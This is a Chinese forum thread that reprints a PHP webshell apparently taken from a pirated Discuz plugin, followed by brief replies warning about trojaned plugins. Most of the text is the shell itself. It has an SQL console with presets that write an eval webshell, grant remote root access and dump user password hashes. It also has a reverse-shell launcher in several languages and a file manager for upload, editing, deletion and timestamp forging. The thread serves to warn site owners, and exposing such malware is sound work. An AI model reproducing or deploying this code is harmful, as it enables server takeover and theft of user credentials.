执行SQL成功</h2>';<br /><li>while ($array = mysql_fetch_array($result, MYSQL_ASSOC)) {<br /><li>$rows[] = $array;<br /><li>}<br /><li>} else {<br /><li>$msg .= '<h1> - 执行SQL失败</h1>';<br /><li>$rows = array(<br /><li>'errno' => mysql_errno(),<br /><li>'error' => mysql_error()<br /><li>);<br /><li>}<br /><li>}<br /><li>mysql_free_result($result);<br /><li>} else {<br /><li>$msg = '<h1>连接' . $type . '失败</h1>';<br /><li>$rows = array(<br /><li>'errno' => mysql_errno(),<br /><li>'error' => mysql_error()<br /><li>);<br /><li>}<br /><li>mysql_close($conn);<br /><li>} else {<br /><li>$msg = '<h1>不支持' . $type . '</h1>';<br /><li>}<br /><li>break;<br /><li>}<br /><li>} else {<br /><li>$type = 'MySql';<br /><li>$sqlhost = 'localhost:3306';<br /><li>$sqluser = 'root';<br /><li>$sqlpass = '123456';<br /><li>$sqlname = 'mysql';<br /><li>$sqlcode = 'select version();';<br /><li>$names = 'gbk';<br /><li>}<br /><li>echo '<div class="msgbox">' . $msg . '</div>';<br /><li>echo '<form method="POST">';<br /><li>subeval();<br /><li>echo '<input type="hidden" name="go" id="go" value="sql">';<br /><li>echo '<table class="tables"><tr><th style="width:15%;">名称</th><th>设置</th></tr>';<br /><li>echo '<tr><td>支持类型</td><td>';<br /><li>$dbs = array(<br /><li>'MySql',<br /><li>'MsSql',<br /><li>'Oracle',<br /><li>'PostgreSql'<br /><li>);<br /><li>foreach ($dbs as $dbname) {<br /><li>echo '<label><input type="radio" name="type" value="' . $dbname . '"' . ($type == $dbname ? ' checked' : '') . '>' . $dbname . '</label> ';<br /><li>}<br /><li>echo '</td></tr><tr><td>连接</td><td>地址 <input type="text" name="sqlhost" style="width:188px;" value="' . $sqlhost . '"> ';<br /><li>echo '用户 <input type="text" name="sqluser" style="width:108px;" value="' . $sqluser . '"> ';<br /><li>echo '密码 <input type="text" name="sqlpass" style="width:108px;" value="' . $sqlpass . '"> ';<br /><li>echo '库名 <input type="text" name="sqlname" style="width:108px;" value="' . $sqlname . '"></td></tr>';<br /><li>echo '<tr><td>语句<br>';<br /><li>echo '<select onchange="$(\'sqlcode\').value=options.value">';<br /><li>echo '<option value="select version();">---语句集合---</option>';<br /><li>echo '<option value="select \'<?php eval ($_POST);?>\' into outfile \'D:/web/shell.php\';">写入文件</option>';<br /><li>echo '<option value="GRANT ALL PRIVILEGES ON *.* TO \'' . $sqluser . '\'@\'%\' IDENTIFIED BY \'' . $sqlpass . '\' WITH GRANT OPTION;">开启外连</option>';<br /><li>echo '<option value="show variables;">系统变量</option>';<br /><li>echo '<option value="create database t00ls;">创建数据库</option>';<br /><li>echo '<option value="create table `t00ls` (`id` INT(10) NOT NULL ,`user` VARCHAR(32) NOT NULL ,`pass` VARCHAR(32) NOT NULL) TYPE = MYISAM;">创建数据表</option>';<br /><li>echo '<option value="show databases;">显示数据库</option>';<br /><li>echo '<option value="show tables from `' . $sqlname . '`;">显示数据表</option>';<br /><li>echo '<option value="show columns from `t00ls`;">显示表结构</option>';<br /><li>echo '<option value="drop table `t00ls`;">删除数据表</option>';<br /><li>echo '<option value="select username,password,salt,email from `pre_ucenter_members` limit 0,30;">显示字段</option>';<br /><li>echo '<option value="insert into `admin` (`user`,`pass`) values (\'t00ls\', \'f1a81d782dea6a19bdca383bffe68452\');">插入数据</option>';<br /><li>echo '<option value="update `admin` set `user` = \'t00ls1\',`pass` = \'50de237e389600acadbeda3d6e6e0b1f\' where `user` = \'t00ls\' and `pass` = \'f1a81d782dea6a19bdca383bffe68452\' limit 1;">修改数据</option>';<br /><li>echo '<option value="t00lsa \'discuzx25\' t00lsb \'pre_ucenter_members\' t00lsc \'username,password,salt,email\' t00lsfile \'' . THISDIR . 'out.txt\';">脱库(MySql)</option>';<br /><li>echo '</select>';<br /><li>echo '</td><td><textarea name="sqlcode" id="sqlcode" style="width:680px;height:80px;">' . htmlspecialchars($sqlcode) . '</textarea></td></tr>';<br /><li>echo '<tr><td>操作</td><td><select name="names">';<br /><li>$charsets = array(<br /><li>'gbk',<br /><li>'utf8',<br /><li>'big5',<br /><li>'latin1',<br /><li>'cp866',<br /><li>'ujis',<br /><li>'euckr',<br /><li>'koi8r',<br /><li>'koi8u'<br /><li>);<br /><li>foreach ($charsets as $charset) {<br /><li>echo '<option value="' . $charset . '"' . ($names == $charset ? ' selected' : '') . '>' . $charset . '</option>';<br /><li>}<br /><li>echo '</select> <input type="submit" style="width:80px;" value="执行"></td></tr>';<br /><li>echo '</table></form>';<br /><li>if ($rows) {<br /><li>echo '<pre style="padding:5px;background:#F8F8F8;text-align:left;">';<br /><li>ob_start();<br /><li>print_r($rows);<br /><li>$out = ob_get_contents();<br /><li>ob_end_clean();<br /><li>if (preg_match('~[\x{4e00}-\x{9fa5}]+~u', $out) && function_exists('iconv')) {<br /><li>$out = @iconv('UTF-8', 'GB2312//IGNORE', $out);<br /><li>}<br /><li>echo htmlspecialchars($out);<br /><li>echo '</pre>';<br /><li>}<br /><li>break;<br /><li>case "backshell":<br /><li>if ((!empty($_POST['backip'])) && (!empty($_POST['backport']))) {<br /><li>$backip = $_POST['backip'];<br /><li>$backport = $_POST['backport'];<br /><li>$temp = $_POST['temp'] ? $_POST['temp'] : '/tmp';<br /><li>$type = $_POST['type'];<br /><li>$msg = backshell($backip, $backport, $temp, $type);<br /><li>} else {<br /><li>$backip = $_SERVER['REMOTE_ADDR'];<br /><li>$backport = '443';<br /><li>$temp = '/tmp';<br /><li>$type = 'pl';<br /><li>$msg = 'PHP反弹可兼容Linux和Windows 其余方法只用于Linux';<br /><li>}<br /><li>echo '<div class="msgbox">' . $msg . '</div>';<br /><li>echo '<form method="POST">';<br /><li>subeval();<br /><li>echo '<input type="hidden" name="go" id="go" value="backshell">';<br /><li>echo '<table class="tables"><tr><th style="width:15%;">名称</th><th>设置</th></tr>';<br /><li>echo '<tr><td>反弹地址</td><td><input type="text" name="backip" style="width:268px;" value="' . $backip . '"> (Your ip)</td></tr>';<br /><li>echo '<tr><td>反弹端口</td><td><input type="text" name="backport" style="width:268px;" value="' . $backport . '"> (nc -vvlp ' . $backport . ')</td></tr>';<br /><li>echo '<tr><td>临时目录</td><td><input type="text" name="temp" style="width:268px;" value="' . $temp . '"> (Only Linux)</td></tr>';<br /><li>echo '<tr><td>反弹方法</td><td>';<br /><li>$types = array(<br /><li>'pl' => 'Perl',<br /><li>'py' => 'Python',<br /><li>'c' => 'C-bin',<br /><li>'pcntl' => 'Pcntl',<br /><li>'php' => 'PHP',<br /><li>'phpwin' => 'PHP-COM'<br /><li>);<br /><li>foreach ($types as $key => $name) {<br /><li>echo '<label><input type="radio" name="type" value="' . $key . '"' . ($key == $type ? ' checked' : '') . '>' . $name . '</label> ';<br /><li>}<br /><li>echo '</td></tr><tr><td>操作</td><td><input type="submit" style="width:80px;" value="反弹"></td></tr>';<br /><li>echo '</table></form>';<br /><li>break;<br /><li>case "edit":<br /><li>case "editor":<br /><li>$file = strdir($_POST['godir'] . '/' . $_POST['govar']);<br /><li>$iconv = function_exists('iconv');<br /><li>if (!file_exists($file)) {<br /><li>$msg = '【新建文件】';<br /><li>} else {<br /><li>$code = filer($file);<br /><li>$chst = '默认';<br /><li>if (preg_match('~[\x{4e00}-\x{9fa5}]+~u', $code) && $iconv) {<br /><li>$chst = 'utf-8';<br /><li>$code = @iconv('UTF-8', 'GB2312//IGNORE', $code);<br /><li>}<br /><li>$size = size(filesize($file));<br /><li>$msg = '【文件属性 ' . substr(decoct(fileperms($file)), -4) . '】【文件大小 ' . $size . '】【文件编码 ' . $chst . '】';<br /><li>}<br /><li>echo base64_decode('PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+DQp2YXIgbiA9IDA7DQpmdW5jdGlvbiBzZWFyY2goc3RyKSB7DQoJdmFyIHR4dCwgaSwgZm91bmQ7DQoJaWYoc3RyID09ICIiKSByZXR1cm4gZmFsc2U7DQoJdHh0ID0gJCgnZmlsZWNvZGUnKS5jcmVhdGVUZXh0UmFuZ2UoKTsNCglmb3IoaSA9IDA7IGkgPD0gbiAmJiAoZm91bmQgPSB0eHQuZmluZFRleHQoc3RyKSkgIT0gZmFsc2U7IGkrKyl7DQoJCXR4dC5tb3ZlU3RhcnQoImNoYXJhY3RlciIsIDEpOw0KCQl0eHQubW92ZUVuZCgidGV4dGVkaXQiKTsNCgl9DQoJaWYoZm91bmQpeyB0eHQubW92ZVN0YXJ0KCJjaGFyYWN0ZXIiLCAtMSk7IHR4dC5maW5kVGV4dChzdHIpOyB0eHQuc2VsZWN0KCk7IHR4dC5zY3JvbGxJbnRvVmlldygpOyBuKys7IH0NCgllbHNlIHsgaWYgKG4gPiAwKSB7IG4gPSAwOyBzZWFyY2goc3RyKTsgfSBlbHNlIGFsZXJ0KHN0ciArICIuLi4gTm90LUZpbmQiKTsgfQ0KCXJldHVybiBmYWxzZTsNCn0NCjwvc2NyaXB0Pg==');<br /><li>echo '<div class="msgbox"><input name="keyword" id="keyword" type="text" style="width:138px;height:15px;"><input type="button" value="IE查找内容" onclick="search($(\'keyword\').value);"> - ' . $msg . '</div>';<br /><li>echo '<form name="editfrm" id="editfrm" method="POST">';<br /><li>subeval();<br /><li>echo '<input type="hidden" name="go" value=""><input type="hidden" name="act" id="act" value="edit">';<br /><li>echo '<input type="hidden" name="dir" id="dir" value="' . dirname($file) . '">';<br /><li>echo '<div class="actall">文件 <input type="text" name="filename" value="' . $file . '" style="width:528px;"> ';<br /><li>if ($iconv) {<br /><li>echo '编码 <select name="tostr">';<br /><li>$selects = array(<br /><li>'normal' => '默认',<br /><li>'utf' => 'utf-8'<br /><li>);<br /><li>foreach ($selects as $var => $name) {<br /><li>echo '<option value="' . $var . '"' . ($name == $chst ? ' selected' : '') . '>' . $name . '</option>';<br /><li>}<br /><li>echo '</select>';<br /><li>}<br /><li>echo '</div><div class="actall"><textarea name="filecode" id="filecode" style="width:698px;height:358px;">' . htmlspecialchars($code) . '</textarea></div></form>';<br /><li>echo '<div class="actall" style="padding:5px;padding-right:68px;"><input type="button" onclick="$(\'editfrm\').submit();" value="保存" style="width:80px;"> ';<br /><li>echo '<form name="backfrm" id="backfrm" method="POST"><input type="hidden" name="go" value=""><input type="hidden" name="dir" id="dir" value="' . dirname($file) . '">';<br /><li>subeval();<br /><li>echo '<input type="button" onclick="$(\'backfrm\').submit();" value="返回" style="width:80px;"></form></div>';<br /><li>break;<br /><li>case "upfiles":<br /><li>$updir = isset($_POST['updir']) ? $_POST['updir'] : $_POST['godir'];<br /><li>$msg = '【最大上传文件 ' . get_cfg_var("upload_max_filesize") . '】【POST最大提交数据 ' . get_cfg_var("post_max_size") . '】';<br /><li>$max = 10;<br /><li>if (isset($_FILES['uploads']) && isset($_POST['renames'])) {<br /><li>$uploads = $_FILES['uploads'];<br /><li>$msgs = array();<br /><li>for ($i = 1; $i < $max; $i++) {<br /><li>if ($uploads['error'][$i] == UPLOAD_ERR_OK) {<br /><li>$rename = $_POST['renames'][$i] == '' ? $uploads['name'][$i] : $_POST['renames'][$i];<br /><li>$filea = $uploads['tmp_name'][$i];<br /><li>$fileb = strdir($updir . '/' . $rename);<br /><li>$msgs[$i] = fileu($filea, $fileb) ? '<br><h2>上传成功 ' . $rename . '</h2>' : '<br><h1>上传失败 ' . $rename . '</h1>';<br /><li>}<br /><li>}<br /><li>}<br /><li>echo '<div class="msgbox">' . $msg . '</div>';<br /><li>echo '<form name="upsfrm" id="upsfrm" method="POST" enctype="multipart/form-data">';<br /><li>subeval();<br /><li>echo '<input type="hidden" name="go" value="upfiles"><input type="hidden" name="act" id="act" value="upload">';<br /><li>echo '<div class="actall"><p>上传到目录 <input type="text" name="updir" style="width:398px;" value="' . $updir . '"></p>';<br /><li>for ($i = 1; $i < $max; $i++) {<br /><li>echo '<p>附件' . $i . ' <input type="file" name="uploads[' . $i . ']" style="width:300px;"> 重命名 <input type="text" name="renames[' . $i . ']" style="width:128px;"> ' . $msgs[$i] . '</p>';<br /><li>}<br /><li>echo '</div></form><div class="actall" style="padding:8px;padding-right:68px;"><input type="button" onclick="$(\'upsfrm\').submit();" value="上传" style="width:80px;"> ';<br /><li>echo '<form name="backfrm" id="backfrm" method="POST"><input type="hidden" name="go" value=""><input type="hidden" name="dir" id="dir" value="' . $updir . '">';<br /><li>subeval();<br /><li>echo '<input type="button" onclick="$(\'backfrm\').submit();" value="返回" style="width:80px;"></form></div>';<br /><li>break;<br /><li>default:<br /><li>if (isset($_FILES['upfile'])) {<br /><li>if ($_FILES['upfile']['name'] == '') {<br /><li>$msg = '<h1>请选择文件</h1>';<br /><li>} else {<br /><li>$rename = $_POST['rename'] == '' ? $_FILES['upfile']['name'] : $_POST['rename'];<br /><li>$filea = $_FILES['upfile']['tmp_name'];<br /><li>$fileb = strdir($nowdir . $rename);<br /><li>$msg = fileu($filea, $fileb) ? '<h2>上传文件' . $rename . '成功</h2>' : '<h1>上传文件' . $rename . '失败</h1>';<br /><li>}<br /><li>}<br /><li>if (isset($_POST['act'])) {<br /><li>switch ($_POST['act']) {<br /><li>case "a":<br /><li>if (!$_POST['files']) {<br /><li>$msg = '<h1>请选择文件 ' . $_POST['var'] . '</h1>';<br /><li>} else {<br /><li>$i = 0;<br /><li>foreach ($_POST['files'] as $filename) {<br /><li>$i += @copy(strdir($nowdir . $filename), strdir($_POST['var'] . '/' . $filename)) ? 1 : 0;<br /><li>}<br /><li>$msg = $msg = $i ? '<h2>共复制 ' . $i . ' 个文件到' . $_POST['var'] . '成功</h2>' : '<h1>共复制 ' . $i . ' 个文件到' . $_POST['var'] . '失败</h1>';<br /><li>}<br /><li>break;<br /><li>case "b":<br /><li>if (!$_POST['files']) {<br /><li>$msg = '<h1>请选择文件</h1>';<br /><li>} else {<br /><li>$i = 0;<br /><li>foreach ($_POST['files'] as $filename) {<br /><li>$i += @unlink(strdir($nowdir . $filename)) ? 1 : 0;<br /><li>}<br /><li>$msg = $i ? '<h2>共删除 ' . $i . ' 个文件成功</h2>' : '<h1>共删除 ' . $i . ' 个文件失败</h1>';<br /><li>}<br /><li>break;<br /><li>case "c":<br /><li>if (!$_POST['files']) {<br /><li>$msg = '<h1>请选择文件 ' . $_POST['var'] . '</h1>';<br /><li>} elseif (!ereg("^{4}$", $_POST['var'])) {<br /><li>$msg = '<h1>属性值错误</h1>';<br /><li>} else {<br /><li>$i = 0;<br /><li>foreach ($_POST['files'] as $filename) {<br /><li>$i += @chmod(strdir($nowdir . $filename), base_convert($_POST['var'], 8, 10)) ? 1 : 0;<br /><li>}<br /><li>$msg = $i ? '<h2>共 ' . $i . ' 个文件修改属性为' . $_POST['var'] . '成功</h2>' : '<h1>共 ' . $i . ' 个文件修改属性为' . $_POST['var'] . '失败</h1>';<br /><li>}<br /><li>break;<br /><li>case "d":<br /><li>if (!$_POST['files']) {<br /><li>$msg = '<h1>请选择文件 ' . $_POST['var'] . '</h1>';<br /><li>} elseif (!preg_match('/(\d+)-(\d+)-(\d+) (\d+):(\d+):(\d+)/', $_POST['var'])) {<br /><li>$msg = '<h1>时间格式错误 ' . $_POST['var'] . '</h1>';<br /><li>} else {<br /><li>$i = 0;<br /><li>foreach ($_POST['files'] as $filename) {<br /><li>$i += @touch(strdir($nowdir . $filename), strtotime($_POST['var'])) ? 1 : 0;<br /><li>}<br /><li>$msg = $i ? '<h2>共 ' . $i . ' 个文件修改时间为' . $_POST['var'] . '成功</h2>' : '<h1>共 ' . $i . ' 个文件修改时间为' . $_POST['var'] . '失败</h1>';<br /><li>}<br /><li>break;<br /><li>case "e":<br /><li>$path = strdir($nowdir . $_POST['var'] . '/');<br /><li>if (file_exists($path)) {<br /><li>$msg = '<h1>目录已存在 ' . $_POST['var'] . '</h1>';<br /><li>} else {<br /><li>$msg = @mkdir($path, 0777) ? '<h2>创建目录 ' . $_POST['var'] . ' 成功</h2>' : '<h1>创建目录 ' . $_POST['var'] . ' 失败</h1>';<br /><li>}<br /><li>break;<br /><li>case "rf":<br /><li>$files = explode('|x|', $_POST['var']);<br /><li>if (count($files) != 2) {<br /><li>$msg = '<h1>输入错误</h1>';<br /><li>} else {<br /><li>$msg = @rename(strdir($nowdir . $files), strdir($nowdir . $files)) ? '<h2>重命名 ' . $files . ' 为 ' . $files . ' 成功</h2>' : '<h1>重命名 ' . $files . ' 为 ' . $files . ' 失败</h1>';<br /><li>}<br /><li>break;<br /><li>case "pd":<br /><li>$files = explode('|x|', $_POST['var']);<br /><li>if (count($files) != 2) {<br /><li>$msg = '<h1>输入错误</h1>';<br /><li>} else {<br /><li>$path = strdir($nowdir . $files);<br /><li>$msg = @chmod($path, base_convert($files, 8, 10)) ? '<h2>修改' . $files . '属性为' . $files . '成功</h2>' : '<h1>修改' . $files . '属性为' . $files . '失败</h1>';<br /><li>}<br /><li>break;<br /><li>case "edit":<br /><li>if (isset($_POST['filename']) && isset($_POST['filecode'])) {<br /><li>if ($_POST['tostr'] == 'utf') {<br /><li>$_POST['filecode'] = @iconv('GB2312//IGNORE', 'UTF-8', $_POST['filecode']);<br /><li>}<br /><li>$msg = filew($_POST['filename'], $_POST['filecode'], 'w') ? '<h2>保存成功 ' . $_POST['filename'] . '</h2>' : '<h1>保存失败 ' . $_POST['filename'] . '</h1>';<br /><li>}<br /><li>break;<br /><li>case "deltree":<br /><li>$deldir = strdir($nowdir . $_POST['var'] . '/');<br /><li>if (!file_exists($deldir)) {<br /><li>$msg = '<h1>目录 ' . $_POST['var'] . ' 不存在</h1>';<br /><li>} else {<br /><li>$msg = deltree($deldir) ? '<h2>删除目录 ' . $_POST['var'] . ' 成功</h2>' : '<h1>删除目录 ' . $_POST['var'] . ' 失败</h1>';<br /><li>}<br /><li>break;<br /><li>}<br /><li>}<br /><li>$array = showdir($nowdir);<br /><li>$thisurl = strdir('/' . strtr($nowdir, array(<br /><li>ROOTDIR => ''<br /><li>)) . '/');<br /><li>$chown = substr(decoct(fileperms($nowdir)), -4);<br /><li>if (!$chown) {<br /><li>$chown = '0000';<br /><li>}<br /><li>$nowdir = strtr($nowdir, array(<br /><li>'\'' => '%27',<br /><li>'"' => '%22'<br /><li>));<br /><li>echo '<div class="msgbox">' . $msg . '</div>';<br /><li>echo '<div class="actall"><form name="frm" id="frm" method="POST">';<br /><li>subeval();<br /><li>echo '当前路径(' . $chown . ') <input type="text" name="dir" id="dir" style="width:500px;" value="' . strdir($nowdir . '/') . '"> ';<br /><li>echo '<input type="button" onclick="$(\'frm\').submit();" style="width:50px;" value="转到"> ';<br /><li>echo '<select onchange="cd(options.value);">';<br /><li>echo '<option>---特殊目录---</option>';<br /><li>echo '<option value="' . ROOTDIR . '"> 网站根目录 </option>';<br /><li>echo '<option value="' . THISDIR . '"> 本程序目录 </option>';<br /><li>echo '<option value="C:/RECYCLER/">Win-RECYCLER</option>';<br /><li>echo '<option value="C:/$Recycle.Bin/">Win-$Recycle</option>';<br /><li>echo '<option value="C:/Program Files/">Win-Program</option>';<br /><li>echo '<option value="C:/Documents and Settings/All Users/Start Menu/Programs/Startup/">Win-Startup</option>';<br /><li>echo '<option value="C:/Documents and Settings/All Users/「开始」菜单/程序/启动/">Win-启动</option>';<br /><li>echo '<option value="C:/Windows/Temp/">Win-TEMP</option>';<br /><li>echo '<option value="/usr/local/">Linux-local</option>';<br /><li>echo '<option value="/tmp/">Linux-tmp</option>';<br /><li>echo '<option value="/etc/">Linux-etc</option>';<br /><li>echo '</select></form></div><div class="actall">';<br /><li>echo '<input type="button" value="新建文件" onclick="nf(\'edit\',\'newfile.php\');" style="width:80px;"> ';<br /><li>echo '<input type="button" value="创建目录" onclick="txts(\'目录名\',\'newdir\',\'e\');" style="width:80px;"> ';<br /><li>echo '<input type="button" value="批量上传" onclick="go(\'upfiles\',\'' . $nowdir . '\');" style="width:80px;"> ';<br /><li>echo '<form name="upfrm" id="upfrm" method="POST" enctype="multipart/form-data">';<br /><li>subeval();<br /><li>echo '<input type="hidden" name="dir" id="dir" value="' . $nowdir . '">';<br /><li>echo '<input type="file" name="upfile" style="width:256px;height:21px;"> ';<br /><li>echo '<input type="button" onclick="$(\'upfrm\').submit();" value="上传" style="width:50px;"> ';<br /><li>echo '上传重命名为 <input type="text" name="rename" style="width:128px;">';<br /><li>echo '</form></div>';<br /><li>echo '<form name="frm1" id="frm1" method="POST"><table class="tables">';<br /><li>subeval();<br /><li>echo '<input type="hidden" name="dir" id="dir" value="' . $nowdir . '">';<br /><li>echo '<input type="hidden" name="act" id="act" value="">';<br /><li>echo '<input type="hidden" name="var" id="var" value="">';<br /><li>echo '<th><a href="javascript:void(0);" onclick="cd(\'' . dirname($nowdir) . '/\');">上级目录</a></th><th style="width:8%">操作</th><th style="width:5%">属性</th><th style="width:17%">创建时间</th><th style="width:17%">修改时间</th><th style="width:8%">下载</th>';<br /><li>if ($array) {<br /><li>asort($array['dir']);<br /><li>asort($array['file']);<br /><li>$dnum = $fnum = 0;<br /><li>foreach ($array['dir'] as $path => $name) {<br /><li>$prem = substr(decoct(fileperms($path)), -4);<br /><li>$ctime = date('Y-m-d H:i:s', filectime($path));<br /><li>$mtime = date('Y-m-d H:i:s', filemtime($path));<br /><li>echo '<tr>';<br /><li>echo '<td><a href="javascript:void(0);" onclick="cd(\'' . $nowdir . $name . '\');"><b>' . strtr($name, array(<br /><li>'%27' => '\'',<br /><li>'%22' => '"'<br /><li>)) . '</b></a></td>';<br /><li>echo '<td><a href="javascript:void(0);" onclick="dels(\'' . $name . '\');">删除</a> ';<br /><li>echo '<a href="javascript:void(0);" onclick="acts(\'' . $name . '\',\'rf\',\'' . $name . '\');">改名</a></td>';<br /><li>echo '<td><a href="javascript:void(0);" onclick="acts(\'' . $prem . '\',\'pd\',\'' . $name . '\');">' . $prem . '</a></td>';<br /><li>echo '<td>' . $ctime . '</td>';<br /><li>echo '<td>' . $mtime . '</td>';<br /><li>echo '<td>-</td>';<br /><li>echo '</tr>';<br /><li>$dnum++;<br /><li>}<br /><li>foreach ($array['file'] as $path => $name) {<br /><li>$prem = substr(decoct(fileperms($path)), -4);<br /><li>$ctime = date('Y-m-d H:i:s', filectime($path));<br /><li>$mtime = date('Y-m-d H:i:s', filemtime($path));<br /><li>$size = size(filesize($path));<br /><li>echo '<tr>';<br /><li>echo '<td><input type="checkbox" name="files[]" value="' . $name . '"><a target="_blank" href="' . $thisurl . $name . '">' . strtr($name, array(<br /><li>'%27' => '\'',<br /><li>'%22' => '"'<br /><li>)) . '</a></td>';<br /><li>echo '<td><a href="javascript:void(0);" onclick="go(\'edit\',\'' . $name . '\');">编辑</a> ';<br /><li>echo '<a href="javascript:void(0);" onclick="acts(\'' . $name . '\',\'rf\',\'' . $name . '\');">改名</a></td>';<br /><li>echo '<td><a href="javascript:void(0);" onclick="acts(\'' . $prem . '\',\'pd\',\'' . $name . '\');">' . $prem . '</a></td>';<br /><li>echo '<td>' . $ctime . '</td>';<br /><li>echo '<td>' . $mtime . '</td>';<br /><li>echo '<td align="right"><a href="javascript:void(0);" onclick="go(\'down\',\'' . $name . '\');">' . $size . '</a></td>';<br /><li>echo '</tr>';<br /><li>$fnum++;<br /><li>}<br /><li>}<br /><li>unset($array);<br /><li>echo '</table>';<br /><li>echo '<div class="actall" style="text-align:left;">';<br /><li>echo '<input type="checkbox" id="chkall" name="chkall" value="on" onclick="sa(this.form);"> ';<br /><li>echo '<input type="button" value="复制" style="width:50px;" onclick=\'txts("复制路径","' . $nowdir . '","a");\'> ';<br /><li>echo '<input type="button" value="删除" style="width:50px;" onclick=\'dels("b");\'> ';<br /><li>echo '<input type="button" value="属性" style="width:50px;" onclick=\'txts("属性值","0666","c");\'> ';<br /><li>echo '<input type="button" value="时间" style="width:50px;" onclick=\'txts("修改时间","' . $mtime . '","d");\'> ';<br /><li>echo '目录[' . $dnum . '] - 文件[' . $fnum . ']</div></form>';<br /><li>break;<br /><li>}<br /><li>?><div class="footag"><?php<br /><li>echo php_uname() . '<br>' . $_SERVER['SERVER_SOFTWARE'];<br /><li>?></div></div></div></body></html><?php<br /><li>unset($array);<br /><li>?></ol><br /><br />

耗子發表於 2019-7-15 11:28:51

  很早之前我就发现了，  告诉了很多站长可他们就是不相信。。  我也没办法

林子浩 發表於 2019-7-15 18:56:07

有人说源码哥的插件里有木马

yeah 發表於 2019-7-16 10:24:59

支持  

安全专员 發表於 2019-7-16 10:39:47

愚蠢的包子 發表於 2019-7-18 16:41:11

<br />无利不起早，做盗版的，那么便宜卖你插件，甚至免费送，背后比如有他的目的：<br />安全小知识：为什么使用盗版插件容易被挂马！<br /><br />在github上活捉一只黑客兼做盗版插件的狗，3315款插件受害！<br />

yehui2512 發表於 2019-7-18 21:17:06

大佬讲解下这代码是啥意思，小白一脸懵逼

花开宜季 發表於 2019-7-19 19:13:31

DZ后台增加功能，“检查权限”，“查杀木马”。<img id="aimg_uC6Ss" onclick="zoom(this, this.src, 0, 0, 0)" class="zoom" src="https://dismall.app1.magcloud.net/public/emotion/face_003.png" onmouseover="img_onmouseoverfunc(this)" lazyloadthumb="1" border="0" alt="" />

頁: [1]

琼殿技术论坛's Archiver

震惊：从某盗版插件里扒出的木马文件，你在人家面前裸奔